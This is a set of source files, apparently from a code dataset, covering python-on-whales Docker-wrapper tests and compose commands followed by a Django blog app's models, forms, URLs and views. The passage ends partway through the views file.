| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,871 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_compose.py | import os
import pytest
from python_on_whales import DockerClient
pytestmark = pytest.mark.skipif(
os.getenv("RUN_COMPOSE_TESTS", "0") == "0", reason="Do not run compose tests"
)
docker = DockerClient(compose_files=["./dummy_compose.yml"])
def test_docker_compose_build():
docker.compose.build()
docker.compose.build(["my_service"])
def test_docker_compose_up_down():
docker.compose.up(detach=True)
docker.compose.down()
def test_docker_compose_up_down_some_services():
docker.compose.up(["my_service", "redis"], detach=True)
docker.compose.down()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,872 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/__init__.py | from .components.buildx import Builder
from .components.container import Container
from .components.image import Image
from .components.network import Network
from .components.node import Node
from .components.service import Service
from .components.stack import Stack
from .components.volume import Volume
from .docker_client import DockerClient
from .utils import DockerException
# alias
docker = DockerClient()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,873 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_node.py | import pytest
from python_on_whales import docker
@pytest.fixture
def with_swarm():
docker.swarm.init()
yield
docker.swarm.leave(force=True)
@pytest.mark.usefixtures("with_swarm")
def test_list_nodes():
nodes = docker.node.list()
assert len(nodes) == 1
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,874 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_network.py | import pytest
from python_on_whales import DockerException, docker
from python_on_whales.components.network import NetworkInspectResult
from python_on_whales.test_utils import random_name
def test_network_create_remove():
my_name = random_name()
my_network = docker.network.create(my_name)
assert my_network.name == my_name
docker.network.remove(my_name)
network_inspect_str = """
{
"Name": "host",
"Id": "ffb3f184cd0a2077f75a507320a9613eec135dc6cb234340ea924d576215e96e",
"Created": "2020-05-04T17:50:40.0997657+02:00",
"Scope": "local",
"Driver": "host",
"EnableIPv6": false,
"IPAM": {
"Driver": "default",
"Options": null,
"Config": []
},
"Internal": false,
"Attachable": false,
"Ingress": false,
"ConfigFrom": {
"Network": ""
},
"ConfigOnly": false,
"Containers": {
"a8d13ad9ac75a3343da098003e22052ac6ada63fa03a216e96f549f636b5ab56": {
"Name": "gabriel_work_env",
"EndpointID": "32b9e188395d7899599382ff4a08a4897475804a4bb8e9cf1fc51c8317180947",
"MacAddress": "",
"IPv4Address": "",
"IPv6Address": ""
}
},
"Options": {},
"Labels": {}
}
"""
def test_parse_inspection():
network_parsed = NetworkInspectResult.parse_raw(network_inspect_str)
assert network_parsed.enable_ipv6 is False
assert network_parsed.driver == "host"
assert network_parsed.ipam.options is None
def test_context_manager():
from python_on_whales import docker
with pytest.raises(DockerException):
with docker.network.create(random_name()) as my_net:
docker.run(
"busybox",
["ping", "idonotexistatall.com"],
networks=[my_net],
remove=True,
)
# an exception will be raised because the container will fail
# but the network will be removed anyway.
assert my_net not in docker.network.list()
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,875 | arnegroskurth/python-on-whales | refs/heads/master | /python_on_whales/components/compose.py | from __future__ import annotations
from typing import List
from python_on_whales.client_config import DockerCLICaller
from python_on_whales.utils import run
class ComposeCLI(DockerCLICaller):
def build(self, services: List[str] = []):
"""Build services declared in a yaml compose file.
# Arguments
services: The services to build (as strings).
If empty (default), all services are built.
"""
full_cmd = self.docker_compose_cmd + ["build"]
full_cmd += services
run(full_cmd, capture_stdout=False)
def config(self):
"""Not yet implemented"""
raise NotImplementedError
def create(self):
"""Not yet implemented"""
raise NotImplementedError
def down(self):
"""Stop and remove the containers"""
full_cmd = self.docker_compose_cmd + ["down"]
run(full_cmd)
def events(self):
"""Not yet implemented"""
raise NotImplementedError
def exec(self):
"""Not yet implemented"""
raise NotImplementedError
def images(self):
"""Not yet implemented"""
raise NotImplementedError
def kill(self):
"""Not yet implemented"""
raise NotImplementedError
def logs(self):
"""Not yet implemented"""
raise NotImplementedError
def pause(self):
"""Not yet implemented"""
raise NotImplementedError
def port(self):
"""Not yet implemented"""
raise NotImplementedError
def ps(self):
"""Not yet implemented"""
raise NotImplementedError
def pull(self):
"""Not yet implemented"""
raise NotImplementedError
def push(self):
"""Not yet implemented"""
raise NotImplementedError
def restart(self):
"""Not yet implemented"""
raise NotImplementedError
def rm(self):
"""Not yet implemented"""
raise NotImplementedError
def run(self):
"""Not yet implemented"""
raise NotImplementedError
def scale(self):
"""Not yet implemented"""
raise NotImplementedError
def start(self):
"""Not yet implemented"""
raise NotImplementedError
def stop(self):
"""Not yet implemented"""
raise NotImplementedError
def top(self):
"""Not yet implemented"""
raise NotImplementedError
def unpause(self):
"""Not yet implemented"""
raise NotImplementedError
def up(self, services: List[str] = [], detach=False):
"""Start the containers.
# Arguments
services: The services to start. If empty (default), all services are
started.
detach: If `True`, run the containers in the background. Only `True` is
supported at the moment.
"""
if not detach:
raise NotImplementedError(
"Only detaching containers is supported at the moment."
)
full_cmd = self.docker_compose_cmd + ["up"]
full_cmd.add_flag("--detach", detach)
full_cmd += services
run(full_cmd, capture_stdout=False)
def version(self):
"""Not yet implemented"""
raise NotImplementedError
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,876 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_service.py | from python_on_whales.components.service import ServiceInspectResult
def test_service_inspect_result_1():
json_inspect = """
{
"ID": "m3m209zl7pxn513ufboctb3q2",
"Version": {
"Index": 102
},
"CreatedAt": "2020-11-14T15:12:39.4142383Z",
"UpdatedAt": "2020-11-14T15:12:39.4169672Z",
"Spec": {
"Name": "my_stack_influxdb",
"Labels": {
"com.docker.stack.image": "influxdb:1.7",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "influxdb:1.7@sha256:481709b32cca5001a6d03022b3a11e152fd4faa3038e5c0b92bb6de59dbbd868",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "volume",
"Source": "my_stack_influx-data",
"Target": "/var/lib/influxdb",
"VolumeOptions": {
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"DriverConfig": {
"Name": "local"
}
}
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 600000000,
"MemoryBytes": 536870912
},
"Reservations": {
"NanoCPUs": 300000000,
"MemoryBytes": 134217728
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"influxdb"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.2/24"
}
]
}
}
"""
service_inspect_result = ServiceInspectResult.parse_raw(json_inspect)
assert service_inspect_result.ID == "m3m209zl7pxn513ufboctb3q2"
assert (
service_inspect_result.spec.labels["com.docker.stack.image"] == "influxdb:1.7"
)
def test_service_inspect_result_2():
json_inspect = """
{
"ID": "r7iyibbjflmmgsgw7wug7gamm",
"Version": {
"Index": 108
},
"CreatedAt": "2020-11-14T15:12:41.0319543Z",
"UpdatedAt": "2020-11-14T15:12:41.0357977Z",
"Spec": {
"Name": "my_stack_agent",
"Labels": {
"com.docker.stack.image": "swarmpit/agent:latest",
"com.docker.stack.namespace": "my_stack",
"swarmpit.agent": "true"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "swarmpit/agent:latest@sha256:f92ba65f7923794d43ebffc88fbd49bfe8cde8db48ca6888ece5747b9ab1375c",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Env": [
"DOCKER_API_VERSION=1.35"
],
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Target": "/var/run/docker.sock",
"ReadOnly": true
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 100000000,
"MemoryBytes": 67108864
},
"Reservations": {
"NanoCPUs": 50000000,
"MemoryBytes": 33554432
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"agent"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Global": {}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.5/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
def test_service_inspect_result_3():
json_inspect = """
{
"ID": "v1z59cs9evr57w36xv3a4r4ny",
"Version": {
"Index": 115
},
"CreatedAt": "2020-11-14T15:12:42.9316045Z",
"UpdatedAt": "2020-11-14T15:12:42.9344438Z",
"Spec": {
"Name": "my_stack_app",
"Labels": {
"com.docker.stack.image": "swarmpit/swarmpit:latest",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "swarmpit/swarmpit:latest@sha256:20fddbdb7b352a5ac06f6d88bcc0ca4f67a45f1a14b18d557f01052a97a27147",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Env": [
"SWARMPIT_DB=http://db:5984",
"SWARMPIT_INFLUXDB=http://influxdb:8086"
],
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Target": "/var/run/docker.sock",
"ReadOnly": true
}
],
"StopGracePeriod": 10000000000,
"Healthcheck": {
"Test": [
"CMD",
"curl",
"-f",
"http://localhost:8080"
],
"Interval": 60000000000,
"Timeout": 10000000000,
"Retries": 3
},
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 500000000,
"MemoryBytes": 1073741824
},
"Reservations": {
"NanoCPUs": 250000000,
"MemoryBytes": 536870912
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Constraints": [
"node.role == manager"
],
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
},
{
"Architecture": "arm64",
"OS": "linux"
},
{
"OS": "linux"
},
{
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"app"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip",
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
]
}
},
"Endpoint": {
"Spec": {
"Mode": "vip",
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
]
},
"Ports": [
{
"Protocol": "tcp",
"TargetPort": 8080,
"PublishedPort": 888,
"PublishMode": "ingress"
}
],
"VirtualIPs": [
{
"NetworkID": "ejkqulgep23uu3a5bmgudnibe",
"Addr": "10.0.0.7/24"
},
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.7/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
def test_service_inspect_result_4():
json_inspect = """
{
"ID": "ttkkm29xchs0gi83n1g0m7ov4",
"Version": {
"Index": 122
},
"CreatedAt": "2020-11-14T15:12:44.7495433Z",
"UpdatedAt": "2020-11-14T15:12:44.7547664Z",
"Spec": {
"Name": "my_stack_db",
"Labels": {
"com.docker.stack.image": "couchdb:2.3.0",
"com.docker.stack.namespace": "my_stack"
},
"TaskTemplate": {
"ContainerSpec": {
"Image": "couchdb:2.3.0@sha256:ee75c9a737e7c48af0170142689959f2d70f93700162fef40818c799dfeecb8e",
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"Privileges": {
"CredentialSpec": null,
"SELinuxContext": null
},
"Mounts": [
{
"Type": "volume",
"Source": "my_stack_db-data",
"Target": "/opt/couchdb/data",
"VolumeOptions": {
"Labels": {
"com.docker.stack.namespace": "my_stack"
},
"DriverConfig": {
"Name": "local"
}
}
}
],
"StopGracePeriod": 10000000000,
"DNSConfig": {},
"Isolation": "default"
},
"Resources": {
"Limits": {
"NanoCPUs": 300000000,
"MemoryBytes": 268435456
},
"Reservations": {
"NanoCPUs": 150000000,
"MemoryBytes": 134217728
}
},
"RestartPolicy": {
"Condition": "any",
"Delay": 5000000000,
"MaxAttempts": 0
},
"Placement": {
"Platforms": [
{
"Architecture": "amd64",
"OS": "linux"
}
]
},
"Networks": [
{
"Target": "cs2i9dj34n2t3d3axzbfibhbg",
"Aliases": [
"db"
]
}
],
"ForceUpdate": 0,
"Runtime": "container"
},
"Mode": {
"Replicated": {
"Replicas": 1
}
},
"UpdateConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"RollbackConfig": {
"Parallelism": 1,
"FailureAction": "pause",
"Monitor": 5000000000,
"MaxFailureRatio": 0,
"Order": "stop-first"
},
"EndpointSpec": {
"Mode": "vip"
}
},
"Endpoint": {
"Spec": {
"Mode": "vip"
},
"VirtualIPs": [
{
"NetworkID": "cs2i9dj34n2t3d3axzbfibhbg",
"Addr": "10.0.3.9/24"
}
]
}
}
"""
ServiceInspectResult.parse_raw(json_inspect)
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,877 | arnegroskurth/python-on-whales | refs/heads/master | /docs/template/docker_objects/containers_demo.py | import sys
from python_on_whales import docker
def super_print(obj):
print(f"type = {type(obj)}, value = {obj}")
def write_code(i: int, attribute_access: str):
value = eval(attribute_access)
string = f"""In [{i}]: super_print({attribute_access})
type = {type(value)}, value = {value}
"""
sys.stdout.write(string)
container = docker.run("ubuntu", ["sleep", "infinity"], detach=True)
with container:
to_evaluate = [
"container.id",
"container.created",
"container.path",
"container.args",
"container.state.status",
"container.state.running",
"container.state.paused",
"container.state.restarting",
"container.state.oom_killed",
"container.state.dead",
"container.state.pid",
"container.state.exit_code",
"container.state.error",
"container.state.started_at",
"container.state.finished_at",
"container.state.health",
"container.image",
"container.resolv_conf_path",
]
for i, attribute_access in enumerate(to_evaluate):
write_code(i + 4, attribute_access)
print("done")
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,878 | arnegroskurth/python-on-whales | refs/heads/master | /tests/python_on_whales/components/test_system.py | from python_on_whales import docker
def test_disk_free():
docker.pull("busybox")
docker.pull("busybox:1")
docker_items_summary = docker.system.disk_free()
assert docker_items_summary.images.active > 1
assert docker_items_summary.images.size > 2000
def test_info():
docker.system.info()
pass
| {"/tests/python_on_whales/components/test_image.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/python_on_whales/test_utils.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_compose.py": ["/python_on_whales/__init__.py"], "/python_on_whales/__init__.py": ["/python_on_whales/components/service.py"], "/tests/python_on_whales/components/test_node.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_network.py": ["/python_on_whales/__init__.py", "/python_on_whales/test_utils.py"], "/tests/python_on_whales/components/test_service.py": ["/python_on_whales/components/service.py"], "/docs/template/docker_objects/containers_demo.py": ["/python_on_whales/__init__.py"], "/tests/python_on_whales/components/test_system.py": ["/python_on_whales/__init__.py"]} |
49,880 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0004_auto_20210128_2037.py | # Generated by Django 2.2.17 on 2021-01-28 20:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0003_auto_20210128_0447'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header'),
),
migrations.AlterField(
model_name='post',
name='thumbnail_image',
field=models.ImageField(blank=True, null=True, upload_to='thumbnail'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,881 | thallesdomician/blog-django | refs/heads/main | /post/models.py | from django.db import models
from django.contrib import admin
from colorfield.fields import ColorField
from django.utils.translation import ugettext_lazy as _
from django.template.defaultfilters import slugify
from tinymce.models import HTMLField
class Category(models.Model):
TEXT_COLOR = (
('w', 'white'),
('b', 'black'),
)
class Meta:
verbose_name_plural = _('Categories')
name = models.CharField(max_length=15)
color_text = models.CharField(max_length=1, choices=TEXT_COLOR, default=TEXT_COLOR[1][0])
color_background = ColorField(default='#A5F8CE')
def __str__(self):
return self.name
class CategoryAdmin(admin.ModelAdmin):
search_fields = ('name',)
fields = ('name',)
class Post(models.Model):
title = models.CharField(max_length=100, verbose_name=_('Title'))
subtitle = models.CharField(max_length=255, verbose_name=_('Subtitle'))
header_image = models.ImageField(upload_to='header/%Y/%m/', null=True, blank=True, verbose_name=_('Header Image'))
thumbnail_image = models.ImageField(upload_to='thumbnail/%Y/%m/', null=True, blank=True, verbose_name=_('Thumbnail Image'))
resume = models.TextField(blank=True, null=True, verbose_name=_('Resume'))
content = HTMLField(blank=True, null=True, verbose_name=_('Content'))
categories = models.ManyToManyField(Category, verbose_name=_('Categories'))
slug = models.SlugField(max_length=100, unique=True, default="slug", editable=False)
created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created'))
updated_at = models.DateTimeField(auto_now=True, verbose_name=_('Updated'))
def __str__(self):
return self.title
def get_categories(self):
categories = self.categories.all()
return ', '.join([x.name for x in categories])
get_categories.short_description = _('Categories')
@property
def header_image_url(self):
if self.header_image and hasattr(self.header_image, 'url'):
return self.header_image.url
@property
def thumbnail_image_url(self):
if self.thumbnail_image and hasattr(self.thumbnail_image, 'url'):
return self.thumbnail_image.url
def save(self, *args, **kwargs):
self.slug = slugify(self.title)
super(Post, self).save(*args, **kwargs)
def has_thumbnail_image(self):
return True if self.thumbnail_image else False
has_thumbnail_image.boolean = True
has_thumbnail_image.short_description = _('Thumbnail')
def has_header_image(self):
return True if self.header_image else False
has_header_image.boolean = True
has_header_image.short_description = _('Image')
class PostAdmin(admin.ModelAdmin):
fieldsets = (
(_('Headers'), {
'fields': (('title', 'subtitle'),),
}),
(_('Images'), {
'fields': (('header_image', 'thumbnail_image',),)
}),
(None, {
'fields': ('resume', 'content', 'categories',)
}),
(_('Dates'), {
'fields': (('created_at', 'updated_at', ),),
'classes': ['collapse', ]
})
)
autocomplete_fields = ('categories',)
list_display = ('title', 'subtitle', 'has_header_image', 'has_thumbnail_image', 'get_categories', 'created_at')
search_fields = ('title', 'subtitle', 'resume', 'content')
list_filter = ('categories__name',)
readonly_fields = ('created_at', 'updated_at')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,882 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0006_auto_20210128_2323.py | # Generated by Django 2.2.17 on 2021-01-28 23:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0005_auto_20210128_2039'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header/%Y/%m/'),
),
migrations.AlterField(
model_name='post',
name='thumbnail_image',
field=models.ImageField(blank=True, null=True, upload_to='thumbnail/%Y/%m/'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,883 | thallesdomician/blog-django | refs/heads/main | /post/urls.py | from django.urls import path
from .views import PostList, PostView, PostUpdate, PostDelete, PostCreate
from django.contrib.auth.decorators import login_required
urlpatterns = [
path('', PostList.as_view(), name='post_list'),
path('new/', login_required(PostCreate.as_view()), name='post_create'),
path('<slug:slug>/', PostView.as_view(), name='post_detail'),
path('<slug:slug>/update/', login_required(PostUpdate.as_view()), name='post_update'),
path('<slug:slug>/delete/', login_required(PostDelete.as_view()), name='post_delete'),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,884 | thallesdomician/blog-django | refs/heads/main | /post/forms.py | from django import forms
from .models import Post
from tinymce.widgets import TinyMCE
from tinymce import models as tinymce_models
class PostForm(forms.ModelForm):
resume = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 10}))
content = forms.CharField(widget=TinyMCE(attrs={'cols': 80, 'rows': 30}))
class Meta:
model = Post
fields = [
'title',
'subtitle',
'header_image',
'thumbnail_image',
'resume',
'content',
'categories'
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,885 | thallesdomician/blog-django | refs/heads/main | /post/views.py | from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.views import View
from django.views.generic import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .models import Post, Category
from .forms import PostForm
from django.shortcuts import render
from django.utils.translation import gettext as _
class HomeView(View):
def get(self, request):
return render(request=request, template_name='base.html')
class PostList(ListView):
model = Post
paginate_by = 2
ordering = ['-created_at']
def get_context_data(self, *, object_list=None, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Blog')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
class PostCreate(CreateView):
model = Post
fields = ['title', 'subtitle', 'header_image', 'thumbnail_image', 'resume', 'content', 'categories']
template_name_suffix = '_create_form'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Create Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
def get_success_url(self, **kwargs):
return reverse_lazy("post_detail", args=(self.object.slug,))
class PostUpdate(UpdateView):
model = Post
form_class = PostForm
template_name_suffix = '_update_form'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Update Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
def get_success_url(self, **kwargs):
return reverse_lazy("post_detail", args=(self.object.slug,))
class PostView(DetailView):
model = Post
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subheader'] = _('Update Post')
context['categories'] = Category.objects.filter(post__isnull=False).order_by('name')
